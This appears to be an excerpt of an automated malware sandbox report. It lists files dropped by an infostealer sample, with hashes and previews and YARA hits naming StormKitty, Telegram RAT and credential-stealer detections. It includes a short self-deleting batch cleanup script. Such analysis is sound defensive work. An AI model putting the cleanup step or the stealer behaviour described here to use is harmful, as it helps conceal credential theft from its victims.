                                                                                                                                                                                                                                SSDEEP:3:flXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXl:
                                                                                                                                                                                                                                MD5:52D46BE6BB8DC6D8FD09925E84A76994
                                                                                                                                                                                                                                SHA1:2639980AA48B17EE9FDC169872703453C8E73DEB
                                                                                                                                                                                                                                SHA-256:03B152B94FC40A782D7E12D58AD1D6B00B1029757811F841F64FDBD4831E694B
                                                                                                                                                                                                                                SHA-512:3EA9EFD5CBD44185EE2709A2CA787E8981FD5DE1C757890F1636C9C79624203ABDB341B9E0075A51733286AEC963043EC2A2AC6651EC9BBA043CDF81B32FD0C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):327680
                                                                                                                                                                                                                                Entropy (8bit):5.792289043356197
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9y/Q1Q5Ng68j/svvi/0KOFUygWK0tWrcBOvZ:9y/Q6P8j/svv40tZB
                                                                                                                                                                                                                                MD5:C28490DA01887AA59D82C54B576DC107
                                                                                                                                                                                                                                SHA1:5C4A2F7A85B686F5767A618D69ADB20367381BDD
                                                                                                                                                                                                                                SHA-256:BC07B9C79B5CD67DBCE8031E5A39E8987494A6185E20F589964020E14FF3E789
                                                                                                                                                                                                                                SHA-512:770835B7AC65B090478B233AA5008557FA447961445558BBBC7CC900B5CB29E1DED2F8E0B318E996E410686B9054F83C1ACE710DE54E8FD039965C4CB110D2C2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.............~.... ... ....@.. .......................`............`.................................(...S.... ..~....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...~.... ......................@..@.reloc.......@......................@..B................`.......H.......t....Y...........................................................@.o..qw.y.pO r.P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
                                                                                                                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):170
                                                                                                                                                                                                                                Entropy (8bit):5.0357559628859905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:mKDDCMNuwGv3Dt+kiE2J5xAIJxyBXLNQDwU1hGDt+kiE2J5xAInTRI7XHVZPy:hWKuZLwkn23fJxwXLSDNewkn23fTSHVk
                                                                                                                                                                                                                                MD5:96B86203564F241E53A59387DEE088ED
                                                                                                                                                                                                                                SHA1:831002B8D875B8F8D8DB8B231AD5783507C4845C
                                                                                                                                                                                                                                SHA-256:000E1406A1F6B0ACD996172B01174F69E0F5740CA93B66F0A5DF081594B9D2BD
                                                                                                                                                                                                                                SHA-512:CEBCE4D5289A352A4D158BAAFFD7AC057AD59F27DE7DC6EB9DDBB835CB3D5EDCD52B23CF0A742745C2D84B0DD3BD73F1560C4B193E5C6DEB038AEF49787B7830
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@echo off..timeout 7 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "3CBD.tmp.Installer.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp4F89.tmp.bat" /f /q..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
